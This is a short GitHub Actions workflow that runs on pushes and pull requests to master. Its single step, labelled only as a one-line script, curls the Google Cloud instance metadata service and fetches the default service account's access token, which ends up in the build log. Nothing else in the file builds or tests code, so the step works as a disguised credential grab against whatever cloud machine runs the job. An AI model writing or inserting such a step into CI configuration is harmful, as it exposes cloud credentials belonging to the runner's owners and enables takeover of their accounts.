name: CI

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]
    
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - uses: actions/checkout@v2
    - name: Run a one-line script
      run:  curl -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token
